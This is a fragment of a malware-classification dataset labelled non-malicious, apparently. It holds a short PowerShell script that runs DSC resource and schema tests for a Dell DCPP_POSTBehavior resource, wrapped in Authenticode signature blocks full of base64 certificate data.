zyOH60mMkjAQc8+hOXeZO4M79KVQ8ubwRhqw5EP1zMA4yAP80UorpHT64BQdiXN/ # nqBIYuWntIgGUY49eU4ma5ZtLsgJvUJNWnUAnYQf4ui4xx/y7MpQcHVMAk7RU6Yu # x2icVAVh5uBYTBgIC9yh/PnQNKNc0i3YvTAVvcZqiRUVQc/D7vM29goAG50sLuf+ # 2J/Hp9ubsughOwEbCyRMmzVtioVnmFN6lHgMtKDgRCltJFdTdU918uPTC3cDM4Tr # OahLGn8JLGckss7KTEeDJmfAQVBsTsf4Rz5fp/MbbGYDSf6reHsIvRXg9f+aU1cj # iYlJ95jQnayH+ZH+ViTS+L5XH0GN6RmAX3pd2GOCnbD/xf/9fASwVEtr/tB9GqE/ # caIr7KNyF0gDmZ5Y/1Rpg4xtr3dVwjZiRlt29Ooy7J08RRaky+e7OmvjlWReH0wS # S61GMKO5WcPaT8IHaaGH/2weWw5XHAjboRnu7dTmT7PJAjrM7blMth30dwfCkUnr # xZ9nFw/hCybjbogTaDoXEcW+sq0O02sj3b8RmRBUrSgAGM/qX3coJxOfWm6EpQxm # LUjWnxssnDU/GLyX99E6doi/TIG9+7pbXt1qO/WlPARkAEg47oSvDuQqXqlbjccf # zFBE # SIG # End signature block
combined_dataset/train/non-malicious/sample_57_53.ps1
sample_57_53.ps1
Test-xDscResource..\DSCResources\DCPP_POSTBehavior Test-xDscSchema..\DSCResources\DCPP_POSTBehavior\DCPP_POSTBehavior.schema.mof # SIG # Begin signature block # MIIutQYJKoZIhvcNAQcCoIIupjCCLqICAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCAUnHgdeSRXcEEl # JRNf6HUY8QIgnV1U1K9JDAHG9T2vyqCCEugwggXfMIIEx6ADAgECAhBOQOQ3VO3m # jAAAAABR05R/MA0GCSqGSIb3DQEBCwUAMIG+MQswCQYDVQQGEwJVUzEWMBQGA1UE # ChMNRW50cnVzdCwgSW5jLjEoMCYGA1UECxMfU2VlIHd3dy5lbnRydXN0Lm5ldC9s # ZWdhbC10ZXJtczE5MDcGA1UECxMwKGMpIDIwMDkgRW50cnVzdCwgSW5jLiAtIGZv # ciBhdXRob3JpemVkIHVzZSBvbmx5MTIwMAYDVQQDEylFbnRydXN0IFJvb3QgQ2Vy # dGlmaWNhdGlvbiBBdXRob3JpdHkgLSBHMjAeFw0yMTA1MDcxNTQzNDVaFw0zMDEx # MDcxNjEzNDVaMGkxCzAJBgNVBAYTAlVTMRYwFAYDVQQKDA1FbnRydXN0LCBJbmMu # MUIwQAYDVQQDDDlFbnRydXN0IENvZGUgU2lnbmluZyBSb290IENlcnRpZmljYXRp # b24gQXV0aG9yaXR5IC0gQ1NCUjEwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIK # AoICAQCngY/3FEW2YkPy2K7TJV5IT1G/xX2fUBw10dZ+YSqUGW0nRqSmGl33VFFq # gCLGqGZ1TVSDyV5oG6v2W2Swra0gvVTvRmttAudFrnX2joq5Mi6LuHccUk15iF+l # OhjJUCyXJy2/2gB9Y3/vMuxGh2Pbmp/DWiE2e/mb1cqgbnIs/OHxnnBNCFYVb5Cr # +0i6udfBgniFZS5/tcnA4hS3NxFBBuKK4Kj25X62eAUBw2DtTwdBLgoTSeOQm3/d # vfqsv2RR0VybtPVc51z/O5uloBrXfQmywrf/bhy8yH3m6Sv8crMU6UpVEoScRCV1 # HfYq8E+lID1oJethl3wP5bY9867DwRG8G47M4EcwXkIAhnHjWKwGymUfe5SmS1dn # DH5erXhnW1XjXuvH2OxMbobL89z4n4eqclgSD32m+PhCOTs8LOQyTUmM4OEAwjig # nPqEPkHcblauxhpb9GdoBQHNG7+uh7ydU/Yu6LZr5JnexU+HWKjSZR7IH9Vybu5Z # HFc7CXKd18q3kMbNe0WSkUIDTH0/yvKquMIOhvMQn0YupGaGaFpoGHApOBGAYGuK # Q6NzbOOzazf/5p1nAZKG3y9I0ftQYNVc/iHTAUJj/u9wtBfAj6ju08FLXxLq/f0u # DodEYOOp9MIYo+P9zgyEIg3zp3jak/PbOM+5LzPG/wc8Xr5F0wIDAQABo4IBKzCC # AScwDgYDVR0PAQH/BAQDAgGGMBIGA1UdEwEB/wQIMAYBAf8CAQEwHQYDVR0lBBYw # FAYIKwYBBQUHAwMGCCsGAQUFBwMIMDsGA1UdIAQ0MDIwMAYEVR0gADAoMCYGCCsG # AQUFBwIBFhpodHRwOi8vd3d3LmVudHJ1c3QubmV0L3JwYTAzBggrBgEFBQcBAQQn # MCUwIwYIKwYBBQUHMAGGF2h0dHA6Ly9vY3NwLmVudHJ1c3QubmV0MDAGA1UdHwQp # MCcwJaAjoCGGH2h0dHA6Ly9jcmwuZW50cnVzdC5uZXQvZzJjYS5jcmwwHQYDVR0O # BBYEFIK61j2Xzp/PceiSN6/9s7VpNVfPMB8GA1UdIwQYMBaAFGpyJnrQHu995ztp # UdRsjZ+QEmarMA0GCSqGSIb3DQEBCwUAA4IBAQAfXkEEtoNwJFMsVXMdZTrA7LR7 # BJheWTgTCaRZlEJeUL9PbG4lIJCTWEAN9Rm0Yu4kXsIBWBUCHRAJb6jU+5J+Nzg+ # LxR9jx1DNmSzZhNfFMylcfdbIUvGl77clfxwfREc0yHd0CQ5KcX+Chqlz3t57jpv # 3ty/6RHdFoMI0yyNf02oFHkvBWFSOOtg8xRofcuyiq3AlFzkJg4sit1Gw87kVlHF # VuOFuE2bRXKLB/GK+0m4X9HyloFdaVIk8Qgj0tYjD+uL136LwZNr+vFie1jpUJuX # bheIDeHGQ5jXgWG2hZ1H7LGerj8gO0Od2KIc4NR8CMKvdgb4YmZ6tvf6yK81MIIG # ejCCBGKgAwIBAgIQXppEwdVMjAFyZoUhC+DGojANBgkqhkiG9w0BAQsFADBjMQsw # CQYDVQQGEwJVUzEWMBQGA1UEChMNRW50cnVzdCwgSW5jLjE8MDoGA1UEAxMzRW50 # cnVzdCBFeHRlbmRlZCBWYWxpZGF0aW9uIENvZGUgU2lnbmluZyBDQSAtIEVWQ1My # MB4XDTI0MDIxNDIwNTQ0MloXDTI1MDIyNzIwNTQ0MVowgdUxCzAJBgNVBAYTAlVT # MQ4wDAYDVQQIEwVUZXhhczETMBEGA1UEBxMKUm91bmQgUm9jazETMBEGCysGAQQB # gjc8AgEDEwJVUzEZMBcGCysGAQQBgjc8AgECEwhEZWxhd2FyZTEfMB0GA1UEChMW # RGVsbCBUZWNobm9sb2dpZXMgSW5jLjEdMBsGA1UEDxMUUHJpdmF0ZSBPcmdhbml6 # YXRpb24xEDAOBgNVBAUTBzUyODAzOTQxHzAdBgNVBAMTFkRlbGwgVGVjaG5vbG9n # aWVzIEluYy4wggGiMA0GCSqGSIb3DQEBAQUAA4IBjwAwggGKAoIBgQDDo1XKkZwW # xJ2HF9BoBTYk8SHvDp3z2FVdLQay6VKOSz+Xrohhe56UrKQOW/pePeBC+bj+GM0j # R7bCZCx0X26sh6SKz3RgIRgc+QP3TRKu6disqSWIjIMKFmNegyQPJbDLaDMhvrVk # j7qobtphs0OB/8N+hSkcTRmiphzDvjwTiYh6Bgt37pPDEvhz1tkZ/fhWWhp355lW # FWYBPmxVS2vTKDRSQnLtJ31dltNBXalMW0ougqtJNVJTm1m9m8ZgkBtm2a2Ydgdg # tYbgye5A0udl0HwcImgiDG1eAKNR1W4eG353UsS7n6IWG93QpF5L++2o7DDcDtBr # 9qtVy3RjzWuzgYW5/wIvLkWS7UolX65tFfwKai617FikhrrqcgWcwfbKVrUA4nL3 # i4OL4718Y9T/8N39Knwp1+ZJx9hMiFVVCr6XteO0LQg18/NFjDzbuRXzX2adEzxm # Fdbw3ZGLUfCYN2LQTa+ssOc2hAEumaiVRdntd2d5TaOHwXhsSaBMnh8CAwEAAaOC # ATUwggExMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFHcDtMS/dbtrhMpavR1yYhFn # +k1vMB8GA1UdIwQYMBaAFM6JT4JRqhWihGLKMSNh0mH7+P54MGcGCCsGAQUFBwEB # BFswWTAjBggrBgEFBQcwAYYXaHR0cDovL29jc3AuZW50cnVzdC5uZXQwMgYIKwYB # BQUHMAKGJmh0dHA6Ly9haWEuZW50cnVzdC5uZXQvZXZjczItY2hhaW4ucDdjMDEG # A1UdHwQqMCgwJqAkoCKGIGh0dHA6Ly9jcmwuZW50cnVzdC5uZXQvZXZjczIuY3Js # MA4GA1UdDwEB/wQEAwIHgDATBgNVHSUEDDAKBggrBgEFBQcDAzAgBgNVHSAEGTAX # MAcGBWeBDAEDMAwGCmCGSAGG+mwKAQIwDQYJKoZIhvcNAQELBQADggIBABB9FgN1 # YzMm05EhuGuTIEQNOwq4VoETYArSR88RLDN9Dr8lu45+WghxE7MigaGKF8AEi6Z3 # diDeN+5TJOiBd6Zv2LDa3UfMpqf8GZm/L1pd5TF19s44NLbxlIad/yq/NbXFcWsc # VNu4TtM/PdCg7E0ggh044pNllpR/Ofqqu2D/kV6TBMw2cgL24l5YZxat+hxfWBuw # Rhtwu/kWiSIe0ad/vB4ChVPY7PvNuU/jCU7PlgXOUiIsPbLsheAoWjxAK+Vl/NYX # 91T/eXBZ7A4McMoprqPeVkKti0OpC2zhb+3NFHjR/gSkVLkmwEh48ebsip6uqEBY # KS9zj6P6g0P8HHlwNZMkQ4llOzjIsQriORfayBAmjDpsgHr0r3Q362+svyI//k1V # HjX3WTTYO1tFfOl0LYVzcfOUj5OY04kH35Y+yi30DGJy2mG0qwlRSAfiDr1a8OpL # eaxkwvN2R2Ml0s6Oiqq0lTuLNFRnl/tCxahaT8liOzFd2WU7I3L5IL0ufRMlbezA # S453qkkX4Xtd7KtRDQnWU5IbzBg8Yswwv+DLNm2Ep7PHTU3t4GiF0O+oaDq83QaM # ovN80wPcCce1PkUB9iSvOuBbbrODjlSFa6OVpLHnvDesW1L99YS8sOitcRnXoNXw # HST4XAO+86tKYUw2XtjBapV1ND20AMhuaZ5KMIIGgzCCBGugAwIBAgIQNa+3e500 # H2r8j4RGqzE1KzANBgkqhkiG9w0BAQ0FADBpMQswCQYDVQQGEwJVUzEWMBQGA1UE # CgwNRW50cnVzdCwgSW5jLjFCMEAGA1UEAww5RW50cnVzdCBDb2RlIFNpZ25pbmcg # Um9vdCBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eSAtIENTQlIxMB4XDTIxMDUwNzE5 # MTk1MloXDTQwMTIyOTIzNTkwMFowYzELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUVu # dHJ1c3QsIEluYy4xPDA6BgNVBAMTM0VudHJ1c3QgRXh0ZW5kZWQgVmFsaWRhdGlv # biBDb2RlIFNpZ25pbmcgQ0EgLSBFVkNTMjCCAiIwDQYJKoZIhvcNAQEBBQADggIP # ADCCAgoCggIBAL69pznJpX3sXWXx9Cuph9DnrRrFGjsYzuGhUY1y+s5YH1y4JEIP # RtUxl9BKTeObMMm6l6ic/kU2zyeA53u4bsEkt9+ndNyF8qMkWEXMlJQ7AuvEjXxG # 9VxmguOkwdMfrG4MUyMO1Dr62kLxg1RfNTJW8rV4m1cASB6pYWEnDnMDQ7bWcJL7 # 1IWaMMaz5ppeS+8dKthmqxZG/wvYD6aJSgJRV0E8QThOl8dRMm1njmahXk2fNSKv # 1Wq3f0BfaDXMafrxBfDqhabqMoXLwcHKg2lFSQbcCWy6SWUZjPm3NyeMZJ414+Xs # 5wegnahyvG+FOiymFk49nM8I5oL1RH0owL2JrWwv3C94eRHXHHBL3Z0ITF4u+o29 # p91j9n/wUjGEbjrY2VyFRJ5jBmnQhlh4iZuHu1gcpChsxv5pCpwerBFgal7JaWUu # 7UMtafF4tzstNfKqT+If4wFvkEaq1agNBFegtKzjbb2dGyiAJ0bH2qpnlfHRh3vH # yCXphAyPiTbSvjPhhcAz1aA8GYuvOPLlk4C/xsOre5PEPZ257kV2wNRobzBePLQ2 # +ddFQuASBoDbpSH85wV6KI20jmB798i1SkesFGaXoFppcjFXa1OEzWG6cwcVcDt7 # AfynP4wtPYeM+wjX5S8Xg36Cq08J8inhflV3ZZQFHVnUCt2TfuMUXeK7AgMBAAGj # ggErMIIBJzASBgNVHRMBAf8ECDAGAQH/AgEAMB0GA1UdDgQWBBTOiU+CUaoVooRi # yjEjYdJh+/j+eDAfBgNVHSMEGDAWgBSCutY9l86fz3Hokjev/bO1aTVXzzAzBggr # BgEFBQcBAQQnMCUwIwYIKwYBBQUHMAGGF2h0dHA6Ly9vY3NwLmVudHJ1c3QubmV0 # MDEGA1UdHwQqMCgwJqAkoCKGIGh0dHA6Ly9jcmwuZW50cnVzdC5uZXQvY3NicjEu # Y3JsMA4GA1UdDwEB/wQEAwIBhjATBgNVHSUEDDAKBggrBgEFBQcDAzBEBgNVHSAE # PTA7MDAGBFUdIAAwKDAmBggrBgEFBQcCARYaaHR0cDovL3d3dy5lbnRydXN0Lm5l # dC9ycGEwBwYFZ4EMAQMwDQYJKoZIhvcNAQENBQADggIBAD4AVLgq849mr2EWxFiT # ZPRBi2RVjRs1M6GbkdirRsqrX7y+fnDk0tcHqJYH14bRVwoI0NB4Tfgq37IE85rh # 13zwwQB6wUCh34qMt8u0HQFh8piapt24gwXKqSwW3JwtDv6nl+RQqZeVwUsqjFHj # xALga3w1TVO8S5QTi1MYFl6mCqe4NMFssess5DF9DCzGfOGkVugtdtWyE3XqgwCu # AHfGb6k97mMUgVAW/FtPEhkOWw+N6kvOBkyJS64gzI5HpnXWZe4vMOhdNI8fgk1c # QqbyFExQIJwJonQkXDnYiTKFPK+M5Wqe5gQ6pRP/qh3NR0suAgW0ao/rhU+B7wrb # fZ8pj6XCP1I4UkGVO7w+W1QwQiMJY95QjYk1RfqruA+Poq17ehGT8Y8ohHtoeUdq # 6GQpTR/0HS9tHsiUhjzTWpl6a3yrNfcrOUtPuT8Wku8pjI2rrAEazHFEOctAPiAS # zghw40f+3IDXCADRC2rqIbV5ZhfpaqpW3c0VeLEDwBStPkcYde0KU0syk83/gLGQ # 1hPl5EF4Iu1BguUO37DOlSFF5osB0xn39CtVrNlWc2MQ4LigbctUlpigmSFRBqqm # DDorY8t52kO50hLM3o9VeukJ8+Ka0yXBezaS2uDlUmfN4+ZUCqWd1HOj0y9dBmSF # A3d/YNjCvHTJlZFot7d+YRl1MYIbIzCCGx8CAQEwdzBjMQswCQYDVQQGEwJVUzEW # MBQGA1UEChMNRW50cnVzdCwgSW5jLjE8MDoGA1UEAxMzRW50cnVzdCBFeHRlbmRl # ZCBWYWxpZGF0aW9uIENvZGUgU2lnbmluZyBDQSAtIEVWQ1MyAhBemkTB1UyMAXJm # hSEL4MaiMA0GCWCGSAFlAwQCAQUAoIGaMBkGCSqGSIb3DQEJAzEMBgorBgEEAYI3 # AgEEMBwGCisGAQQBgjcCAQsxDjAMBgorBgEEAYI3AgEVMC4GCisGAQQBgjcCAQwx # IDAeoByAGgBEAGUAbABsACAAUwBvAGwAdQB0AGkAbwBuMC8GCSqGSIb3DQEJBDEi # BCDl33BWU8sFMMD/jzT/eC2qjjJkXNx+y0j/p6IgURMAyjANBgkqhkiG9w0BAQEF # AASCAYBYDsmHM7vGQV0fBajW76Krdf4STGx8RAfshGIt1VBqZ6j5EwvHXBTLfdad # XHVFMYqDMTQra0A/u6pCspJzir4JqPnz5rJhSuyNhQzvpUpLdKPc+nliA/LruZtj # unJFGXvQnCFFplBlmR9KtF+KGhJT4RkbMUvtFh1SuSmHbhxYo8MR5yvQskNgSwvO # RTbDo6mqvLqIuIe1G1sJNKkgxt2lYX50z9YBxZXwLQR7Tk0Cog6u0Rj6r49MeKui # G+uJjHQ8QvqYmwFmQIX6nAuIRLw67+QYi9ALRHGjDR1RdxHHWzSmyRti8Jjo/JSH # 6xWwEttz2qWC36ZhnNNHKYBjO/R8LVxMwQ9M98l8vebs5BdL1uBq+RfTcKNLztGD # smFMGFS5BWtzSZkaOqzlRmrzZdbt2L+4cf4lQ3XW/Ye7XCHzzjugGOmadQiqlJ3Y # Rj0Jvp3B+tunuCqbSNSPmvMS7YyuXP7ySTlaVBFqcn8ZA81KkxvG7KsmAsrOpHtw # B7lkyNuhghhgMIIYXAYKKwYBBAGCNwMDATGCGEwwghhIBgkqhkiG9w0BBwKgghg5 # MIIYNQIBAzENMAsGCWCGSAFlAwQCAzCB9AYLKoZIhvcNAQkQAQSggeQEgeEwgd4C # AQEGCmCGSAGG+mwKAwUwMTANBglghkgBZQMEAgEFAAQg4o/10fgUwugsFIuy6NOR # TRgF+98M29PrfkMird3SOFoCCQD/dqvWr7LLZhgPMjAyNDA0MTgwNzMyNDlaMAMC # AQGgeaR3MHUxCzAJBgNVBAYTAkNBMRAwDgYDVQQIEwdPbnRhcmlvMQ8wDQYDVQQH # EwZPdHRhd2ExFjAUBgNVBAoTDUVudHJ1c3QsIEluYy4xKzApBgNVBAMTIkVudHJ1 # c3QgVGltZXN0YW1wIEF1dGhvcml0eSAtIFRTQTKgghMOMIIF3zCCBMegAwIBAgIQ # TkDkN1Tt5owAAAAAUdOUfzANBgkqhkiG9w0BAQsFADCBvjELMAkGA1UEBhMCVVMx # FjAUBgNVBAoTDUVudHJ1c3QsIEluYy4xKDAmBgNVBAsTH1NlZSB3d3cuZW50cnVz # dC5uZXQvbGVnYWwtdGVybXMxOTA3BgNVBAsTMChjKSAyMDA5IEVudHJ1c3QsIElu # Yy4gLSBmb3IgYXV0aG9yaXplZCB1c2Ugb25seTEyMDAGA1UEAxMpRW50cnVzdCBS # b290IENlcnRpZmljYXRpb24gQXV0aG9yaXR5IC0gRzIwHhcNMjEwNTA3MTU0MzQ1 # WhcNMzAxMTA3MTYxMzQ1WjBpMQswCQYDVQQGEwJVUzEWMBQGA1UECgwNRW50cnVz # dCwgSW5jLjFCMEAGA1UEAww5RW50cnVzdCBDb2RlIFNpZ25pbmcgUm9vdCBDZXJ0 # aWZpY2F0aW9uIEF1dGhvcml0eSAtIENTQlIxMIICIjANBgkqhkiG9w0BAQEFAAOC # Ag8AMIICCgKCAgEAp4GP9xRFtmJD8tiu0yVeSE9Rv8V9n1AcNdHWfmEqlBltJ0ak # phpd91RRaoAixqhmdU1Ug8leaBur9ltksK2tIL1U70ZrbQLnRa519o6KuTIui7h3 # HFJNeYhfpToYyVAslyctv9oAfWN/7zLsRodj25qfw1ohNnv5m9XKoG5yLPzh8Z5w # TQhWFW+Qq/tIurnXwYJ4hWUuf7XJwOIUtzcRQQbiiuCo9uV+tngFAcNg7U8HQS4K # E0njkJt/3b36rL9kUdFcm7T1XOdc/zubpaAa130JssK3/24cvMh95ukr/HKzFOlK # VRKEnEQldR32KvBPpSA9aCXrYZd8D+W2PfOuw8ERvBuOzOBHMF5CAIZx41isBspl # H3uUpktXZwx+Xq14Z1tV417rx9jsTG6Gy/Pc+J+HqnJYEg99pvj4Qjk7PCzkMk1J # jODhAMI4oJz6hD5B3G5WrsYaW/RnaAUBzRu/roe8nVP2Lui2a+SZ3sVPh1io0mUe # yB/Vcm7uWRxXOwlyndfKt5DGzXtFkpFCA0x9P8ryqrjCDobzEJ9GLqRmhmhaaBhw # KTgRgGBrikOjc2zjs2s3/+adZwGSht8vSNH7UGDVXP4h0wFCY/7vcLQXwI+o7tPB # S18S6v39Lg6HRGDjqfTCGKPj/c4MhCIN86d42pPz2zjPuS8zxv8HPF6+RdMCAwEA # AaOCASswggEnMA4GA1UdDwEB/wQEAwIBhjASBgNVHRMBAf8ECDAGAQH/AgEBMB0G # A1UdJQQWMBQGCCsGAQUFBwMDBggrBgEFBQcDCDA7BgNVHSAENDAyMDAGBFUdIAAw # KDAmBggrBgEFBQcCARYaaHR0cDovL3d3dy5lbnRydXN0Lm5ldC9ycGEwMwYIKwYB # BQUHAQEEJzAlMCMGCCsGAQUFBzABhhdodHRwOi8vb2NzcC5lbnRydXN0Lm5ldDAw # BgNVHR8EKTAnMCWgI6Ahhh9odHRwOi8vY3JsLmVudHJ1c3QubmV0L2cyY2EuY3Js # MB0GA1UdDgQWBBSCutY9l86fz3Hokjev/bO1aTVXzzAfBgNVHSMEGDAWgBRqciZ6 # 0B7vfec7aVHUbI2fkBJmqzANBgkqhkiG9w0BAQsFAAOCAQEAH15BBLaDcCRTLFVz # HWU6wOy0ewSYXlk4EwmkWZRCXlC/T2xuJSCQk1hADfUZtGLuJF7CAVgVAh0QCW+o # 1PuSfjc4Pi8UfY8dQzZks2YTXxTMpXH3WyFLxpe+3JX8cH0RHNMh3dAkOSnF/goa # pc97ee46b97cv+kR3RaDCNMsjX9NqBR5LwVhUjjrYPMUaH3LsoqtwJRc5CYOLIrd # RsPO5FZRxVbjhbhNm0VyiwfxivtJuF/R8paBXWlSJPEII9LWIw/ri9d+i8GTa/rx # YntY6VCbl24XiA3hxkOY14FhtoWdR+yxnq4/IDtDndiiHODUfAjCr3YG+GJmerb3 # +sivNTCCBm8wggRXoAMCAQICECW8K/MpyhB/Hqm6iIXUnTswDQYJKoZIhvcNAQEN # BQAwaTELMAkGA1UEBhMCVVMxFjAUBgNVBAoMDUVudHJ1c3QsIEluYy4xQjBABgNV # BAMMOUVudHJ1c3QgQ29kZSBTaWduaW5nIFJvb3QgQ2VydGlmaWNhdGlvbiBBdXRo # b3JpdHkgLSBDU0JSMTAeFw0yMTA1MDcxOTIyMTRaFw00MDEyMjkyMzU5MDBaME4x # CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1FbnRydXN0LCBJbmMuMScwJQYDVQQDEx5F # bnRydXN0IFRpbWUgU3RhbXBpbmcgQ0EgLSBUUzIwggIiMA0GCSqGSIb3DQEBAQUA # A4ICDwAwggIKAoICAQC1AyoGtoRPNMyeMb7qjsZ7biAkDwPXvYE2M+Zv0j67xJ6q # oMxmXUJgNFHiLWGDujyeaLhLw2aOpd4rupstQaXe0MtXBS2I2cBGiG08NQ0ZkKy4 # DBnwTMXbRVvcO8K8jUQA4Dj//13IzwiaPdSy63uVw8SlAOBiAWRZX4zje4up+UW3 # xrCiCjdDuEaBq4Z+fy/e8F/rzSDMpS0x46gumZvgeN30212CY30wOYh+JAbmfGCE # eMhcKeWVy/V7T89Y3JDPp6J7FFTE4DeYMMGbtq6cKfZrJUPnEmo+GYu+wOeB10ow # CH58jd8880iTId6Bg2qdAD7XYLrRs2IIlum2SQA49Fx2Ddp3aj2gld4eocxZel6f # z+l2XUDytRW1YGgs81rJI4PY9RpraSikttSuYgbeJkW93ulWd6rcZLBBzcwT8V1x # dLKUCEtPMm5+cLh36dUyN8J63kIS6HEc4thiv6prQYYGW+ZpviYJ9JfC/kz0gHKE # btvexQepjhWibeEb4AkP9aAHoLvEd3MJPAeTjQG1EmctTRm1uMXJEKtwz0L/pScd # 1hLW5BhEYPs5XYS7ZrVTEp0DFIJlKbTsSXL9s0PlwwIpJLof+Li+XaO3Lqn8z2LZ # +pfEE3jjVblaeoTr/7vPaYjAtvmLYIVBEFDHBRDSXnadPjXs9k+K+RJ7P68LNwID # AQABo4IBLDCCASgwEgYDVR0TAQH/BAgwBgEB/wIBADAdBgNVHQ4EFgQUJg/wxEgI # G83dkfVUVLazs/yZ8QgwHwYDVR0jBBgwFoAUgrrWPZfOn89x6JI3r/2ztWk1V88w # MwYIKwYBBQUHAQEEJzAlMCMGCCsGAQUFBzABhhdodHRwOi8vb2NzcC5lbnRydXN0 # Lm5ldDAxBgNVHR8EKjAoMCagJKAihiBodHRwOi8vY3JsLmVudHJ1c3QubmV0L2Nz # YnIxLmNybDAOBgNVHQ8BAf8EBAMCAYYwEwYDVR0lBAwwCgYIKwYBBQUHAwgwRQYD # VR0gBD4wPDAwBgRVHSAAMCgwJgYIKwYBBQUHAgEWGmh0dHA6Ly93d3cuZW50cnVz # dC5uZXQvcnBhMAgGBmeBDAEEAjANBgkqhkiG9w0BAQ0FAAOCAgEAdj1GaIVfCcDO # yfjHuNd+p1w7C0ZzziJTizj2Ebp3xMKHIY8n2QyV6+hL5VzXkBVvqCosimrgIhE0 # efq9lnnIdhbNsUTqcVEPm1XJGHzVgnmc86a3k6kFOHICBpehqLJ5fl4I4m5seZqo # h5TOf49VNkAPnz9R1Wa+e6uG5m6Huk5jXbHYjh/LZ8MNcNp665OyFITSPn2TPxYM # NqBceQCfC27lhCrYiMFtBLc385KacOA7A/3NuyeCzi/8jeSyyr74JYXG7XTIPTVf # OAk9eU/rG+BBXqV0gT9RFcD4SYiPursF1K1FgjN5wSWNX1Q9keS4nxeYAF2tKOVP # Xxv7+FS1pcQk/PB2O/gNXsxHsMqqu25R31O1SRrxYIe3+f1pBnVfc9YRkPKAWI7l # ww8DmIwEU7Mph98/97DpTFeBJER5aP4bNgfWZT3sb9bCtaphfGYG7NLlaYD4cZIu # XOIRRhhFS9b6BWTvu94GykMlvd+NyQF0YYjb8MemPeMMcbx/S+fI4G7g2oD5AJ7A # ayXVo7pcK/7EYCAUSgcjMeUay5FEspp7Q/FbmLUhS7gxOyJU7nlh95qUG2YnKsbf # 4WVd73E55lAl/Yc0ua5dfCc752WT+CiEsW+GkyyTk7Zwr6HuyKRhqYQ7+wq3+Lht # Ju5HTvVeBfqcDxF918uRrkMg9xVZY7wwgga0MIIEnKADAgECAhBbcCbMlvZ4GruF # 9hH1bbtuMA0GCSqGSIb3DQEBDQUAME4xCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1F # bnRydXN0LCBJbmMuMScwJQYDVQQDEx5FbnRydXN0IFRpbWUgU3RhbXBpbmcgQ0Eg # LSBUUzIwHhcNMjQwMTE5MTY0NzQ3WhcNMzUwNDE4MDAwMDAwWjB1MQswCQYDVQQG # EwJDQTEQMA4GA1UECBMHT250YXJpbzEPMA0GA1UEBxMGT3R0YXdhMRYwFAYDVQQK # Ew1FbnRydXN0LCBJbmMuMSswKQYDVQQDEyJFbnRydXN0IFRpbWVzdGFtcCBBdXRo # b3JpdHkgLSBUU0EyMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAqoYE # OF6PaL+D9Vr9VJvFfTp1ncSnLU9t6dAFH1HjM7svXzqxllSK6Qh8NK2Jg1WknwLM # IwvYG3pApMyfQuoTf3y44LdKAgXig0kEbwaGzXNBqYPUmGf69FIZeuNKWSiHVhdd # SPGGkQu4ImTbQfldVLU1pG443AgNGlYYQMN+mDxCM4QNxaVhUc4gbU8Ay0LwqHUb # 20b+Kdwbntf4GAVRdjCbdL2VHxlTZRVHLFZja+m6SKwKOLbBcv0gCqN0GmsHf9Hd # rBfOtRzHeokM7G0cMI0F8K89l8w1tLUFA2a6nnb8OdrImtYSEuRBwoUiQPDLuojp # 0ofCq8Y0O+WrDQAGDga1i3vRCyLaPKjJVnvwNQSW6llGjI/UoLWpg7DOhPtLROVB # qBbzr9rRoCdw3wfvN/Oukc7UIX+GmNxe7o/A2kfbacoQuZGVgBVj8SsawpahH8L3 # PNT2fSQHJahUlG8KVdvbJENuLjuie0m7tdYYj9kEs77qx7VkmkvOUmEeKwUeYzdG # nbHJ1V6HpOrXNLIhQhe4Oig6XqXtPv03F39jIPJ71l/K8xQ/4c7/ineUZm2JweDs # fwRwOGQn9acXfU3KDIEbxeXxNsV6rn0ppEc1OPoN9FMDKQX8b6GLyc3xuIhA09Lb # niUxrdfmWtgEtIS7BEZhZv9dMt780z58Thjvft8CAwEAAaOCAWUwggFhMAwGA1Ud # EwEB/wQCMAAwHQYDVR0OBBYEFPV2GvgQmJKhG3epACzxlWICC3knMB8GA1UdIwQY # MBaAFCYP8MRICBvN3ZH1VFS2s7P8mfEIMGgGCCsGAQUFBwEBBFwwWjAjBggrBgEF # BQcwAYYXaHR0cDovL29jc3AuZW50cnVzdC5uZXQwMwYIKwYBBQUHMAKGJ2h0dHA6 # Ly9haWEuZW50cnVzdC5uZXQvdHMyLWNoYWluMjU2LnA3YzAxBgNVHR8EKjAoMCag # JKAihiBodHRwOi8vY3JsLmVudHJ1c3QubmV0L3RzMmNhLmNybDAOBgNVHQ8BAf8E # BAMCB4AwFgYDVR0lAQH/BAwwCgYIKwYBBQUHAwgwTAYDVR0gBEUwQzA3BgpghkgB # hvpsCgEHMCkwJwYIKwYBBQUHAgEWG2h0dHBzOi8vd3d3LmVudHJ1c3QubmV0L3Jw # YTAIBgZngQwBBAIwDQYJKoZIhvcNAQENBQADggIBAKmrfb8aAIVb3O1xJl6Ugq9c # gkv6HDnFU7XDBt0DYH75YZpBIMKuQRcupUIIkQlelzCYgUXWsrWEPYvphwfaAT/g # CFhnESCUHsAWjmN3vZtsBY09tcuaMalKXGIyohPOkJwNx5BPZ8PgqH+HhEvX8sEh # DxDnF7n7vQnMvoqmAf5Ngk9pIJp1a+QN91AmU/wz9/4brqdqwKjrHq8i0z1gFZ+6 # 5NUppLVXn7Fl9rFMYdXSyNq3rKoYHyAYiqb49Qf5civ2Y9glnBb++5TfhnSiILTy # CN8W7zmAdjqSsdCWg2rafFOJWRsNXPG7KfIhT2EsJIn4dgl/2WiQjlcMZNV2AHFZ # 89SEyDyhiH+ob/O9bn+wqI7mk2zpFMV1HAwrzvIH+7Wu1EExv8HMaZgYrlsIj6tc # ZLmEar1cOKHfT0K3S1tS0973O8ufb8JZQiJOCxi3Isgv/GoJhe1QKVF6xJRLtnFl # ikqGmkt4S1aKod4vi5NbMsyhue+ptgzYBgsXML8Nb4+TrMsR9fHHAJ7QGdecX45U # fGupQztj3MFEq72MOkPwcj8klc2EkV0hAA14aw1cIySfTK80yxRa3rHkRVD9r2+n # BYKnc8/P6ZLqcyqx4d2iA+YgvB1nGlbCLvasX8pOgbDmWh1zz9IU81B4KAVOFW6F # 